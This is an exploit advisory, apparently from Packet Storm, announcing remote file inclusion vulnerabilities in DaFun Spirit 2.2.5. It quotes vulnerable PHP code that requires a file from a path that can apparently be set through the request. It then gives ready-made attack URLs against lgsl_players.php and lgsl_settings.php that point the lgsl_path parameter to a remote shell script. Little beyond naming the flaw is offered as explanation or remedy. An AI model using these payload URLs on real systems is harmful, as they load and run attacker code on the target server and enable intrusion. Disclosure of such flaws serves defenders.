DaFun Spirit version 2.2.5 suffers from remote file inclusion vulnerabilities.
4f947e4b0c84b80eb20270a192c216953323276624f4794a1eb1a8b423cba10a \\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
Vuln Code
//-----------------------------------------------------------------------------------------------------------+
$lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION
//-----------------------------------------------------------------------------------------------------------+
require_once($lgsl_path."lgsl_protocol.php");
$get_ip = $_GET[ip];
$get_port = $_GET[port];
//-----------------------------------------------------------------------------------------------------------+
Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]
Greetings: All Hackerz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed